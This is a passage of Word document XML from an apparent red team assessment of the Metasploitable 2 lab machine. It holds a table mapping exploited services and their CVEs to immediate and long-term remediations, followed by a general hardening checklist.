    <w:bookmarkEnd w:id="25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214" w:after="0" w:line="321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385"/>
          <w:noProof/>
        </w:rPr>
      </w:pP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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>6.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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Consolidated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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Remediation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1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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="214" w:after="0" w:line="321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385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398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8" coordorigin="1292,1450" coordsize="9901,19" o:spt="12" path="m1292,1460l11193,1460">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 98" type="Shape 98" style="position:absolute;left:0;text-align:left;margin-left:63.58pt;width:497.07pt;height:2.96pt;mso-position-horizontal-relative:page;margin-top:-1pt;mso-position-vertical-relative:paragraph;z-index:3816" filled="f" stroked="t" strokeweight="0.96pt" strokecolor="#00B4D8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358"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
          <w:insideH w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
          <w:insideV w:val="single" w:sz="2" w:space="0" w:color="D0D7E3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02"/>
        <w:gridCol w:w="2559"/>
        <w:gridCol w:w="2804"/>
        <w:gridCol w:w="2598"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="437" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="1402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58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Port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shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2559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78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2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2804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95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21"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Immediate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 </w:t>
            </w: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6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2598" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117"/>
              <w:jc w:val="left"/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30"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:color w:val="#FFFFFF"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-15"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Long-Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="579" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="81" w:after="0" w:line="202" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117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1"/>
                <w:noProof/>
              </w:rPr>
            </w:pP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21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FTP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shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2559" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="230" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="367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vsftpd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backdoor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CVE-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2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2804" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="230" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="226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6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Upgrade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vsftpd;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block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port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5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2598" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="230" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="769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Replace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FTP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with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  <w:t>SFTP/SCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="655" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="121" w:after="0" w:line="202" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117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1"/>
                <w:noProof/>
              </w:rPr>
            </w:pP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22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SSH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tcW w:w="2559" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="143" w:after="0" w:line="202" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117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Weak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default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credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2804" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="230" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="231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3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Rotate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credentials;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enable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  <w:t>key-auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2598" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="230" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="482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Enforce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MFA;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deploy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  <w:t>fail2ban</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="578" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="19" w:after="24" w:line="210" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="493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1"/>
                <w:noProof/>
              </w:rPr>
            </w:pP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-12"/>
                <w:noProof/>
              </w:rPr>
              <w:t>23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-25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-12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Telnet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shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2559" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="230" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="57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7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Cleartext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protocol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+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weak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  <w:t>creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2804" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="230" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="586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3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Disable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Telnet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service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  <w:t>entirely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="2598" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="107" w:after="0" w:line="202" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="-120"/>
              <w:jc w:val="center"/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SSH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only;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firewall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port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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="655" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="121" w:after="0" w:line="202" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="-80"/>
              <w:jc w:val="center"/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1"/>
                <w:noProof/>
              </w:rPr>
            </w:pP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80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HTTP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vAlign w:val="center"/>
            <w:tcW w:w="2559" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="230" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="155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PHP-CGI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4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injection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CVE-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2012-1823</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2804" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="230" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="363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Upgrade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PHP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+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Apache;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  <w:t>patch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immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2598" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="148" w:after="0" w:line="202" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="-100"/>
              <w:jc w:val="center"/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Deploy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4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WAF;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use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HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="578" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="0" w:line="202" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="-80"/>
              <w:jc w:val="center"/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1"/>
                <w:noProof/>
              </w:rPr>
            </w:pP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445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SMB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shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2559" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="230" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="154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Samba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RCE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CVE-2007-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2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2447</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="2804" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="107" w:after="0" w:line="202" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117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4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Upgrade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Samba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5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3.0.25+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2598" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="230" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="279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7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Disable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SMB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if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unused;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segment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="658" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="25" w:line="230" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="372"/>
              <w:jc w:val="left"/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1"/>
                <w:noProof/>
              </w:rPr>
            </w:pP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0"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3306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1"/>
                <w:noProof/>
              </w:rPr>
              <w:t>/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#333333"/>
                <w:spacing w:val="2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:tcW w:w="2559" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="148" w:after="0" w:line="202" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117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1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No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root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password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2804" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="230" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="343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1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Set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strong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root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2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>password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immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2598" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="230" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="7"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:color w:val="#333333"/>
                <w:spacing w:val="-3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Restrict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0"/>
                <w:noProof/>
              </w:rPr>
              <w:t>localhost;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-1"/>
                <w:noProof/>
              </w:rPr>
              <w:t>patch </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:color w:val="#333333"/>
                <w:spacing w:val="3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="512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1"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="259" w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360"/>
        <w:jc w:val="left"/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71"/>
          <w:noProof/>
        </w:rPr>
      </w:pP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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>6.1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General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6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Security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21"/>
          <w:noProof/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:color w:val="#1B3A5C"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-19"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Hardening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7" coordorigin="1052,7053" coordsize="10141,10" o:spt="12" path="m1052,7058l11193,7058">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 127" type="Shape 127" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:25pt;mso-position-vertical-relative:paragraph;z-index:4058" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="116" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="-360" w:left="1080" w:right="541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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="1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9"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Patch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21"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Management: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Implement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regular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patching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cycle.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All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exploited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services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were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running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versions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that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were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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>years</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="66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some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cases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over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12"/>
          <w:noProof/>
        </w:rPr>
        <w:t>decade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="61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out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of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date.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="66" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="-360" w:left="1080" w:right="1128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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="1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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Credential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8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4"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Policy: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Enforce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complex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passwords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across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all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services.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Remove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all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default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credentials.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Implement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Multi-Factor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Authentication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wherever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possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="66" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="-360" w:left="1080" w:right="578"/>
        <w:jc w:val="left"/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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="1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24"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Network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8"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Segmentation: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Restrict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access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management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ports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(21,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22,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23,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445,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3306)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using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firewall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rules.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Only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trusted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IPs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should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reach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these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services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="67" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="-360" w:left="1080" w:right="295"/>
        <w:jc w:val="left"/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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="1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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Disable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8"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Unused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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Services: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Remove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or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disable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any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not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explicitly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required.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Each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running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represents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an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additional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attack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surface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="66" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="-360" w:left="1080" w:right="398"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="8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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="1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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Principle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5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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>of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21"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Least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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Privilege: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No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should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run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root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unless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absolutely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necessary.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Web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servers,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databases,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FTP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daemons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should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use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dedicated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low-privilege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accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="66" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="-360" w:left="1080" w:right="616"/>
        <w:jc w:val="left"/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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="1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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Monitoring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43"/>
          <w:noProof/>
        </w:rPr>
        <w:t>&amp; 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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Logging: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Enable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centralized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logging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all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services.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Deploy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IDS/IPS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(e.g.,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Snort,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Suricata).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Alert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failed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authentication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unexpected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new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listening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ports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="47" w:after="0" w:line="260" w:lineRule="exact"/>
        <w:ind w:firstLine="-360" w:left="1080" w:right="1113"/>
        <w:jc w:val="left"/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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="113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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Regular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6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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Vulnerability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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t> 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15"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Scans:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#1B3A5C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Schedule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automated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scans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using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tools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such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Nessus,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OpenVAS,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or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Tenable.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Treat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scan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output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as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work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items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defined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SLAs.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307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25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484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sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="621" w:right="720" w:bottom="481" w:left="720" w:header="0" w:footer="0" w:gutter="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="26" w:name="26"/>
    <w:bookmarkEnd w:id="26"/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
          <w:color w:val="#E63946"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-166"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2692"/>
          <w:tab w:val="left" w:pos="2851"/>
          <w:tab w:val="left" w:pos="8384"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="189" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360"/>
        <w:jc w:val="left"/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66"/>
          <w:noProof/>
        </w:rPr>
      </w:pP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RED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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>TEAM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ASSESSMENT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3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•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0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Metasploitable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>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="#1B3A5C"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="1"/>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="#E63946"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-14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052,912" coordsize="10141,10" o:spt="12" path="m1052,917l11193,917">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 46" type="Shape 46" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:9pt;mso-position-vertical-relative:paragraph;z-index:3814" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="214" w:after="0" w:line="322" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="600"/>
        <w:jc w:val="left"/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95"/>
          <w:noProof/>
        </w:rPr>
      </w:pP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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>7.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5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20"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Conclusion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0" coordorigin="1292,1450" coordsize="9901,19" o:spt="12" path="m1292,1460l11193,1460">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 70" type="Shape 70" style="position:absolute;left:0;text-align:left;margin-left:63.58pt;width:497.07pt;height:2.96pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3816" filled="f" stroked="t" strokeweight="0.96pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
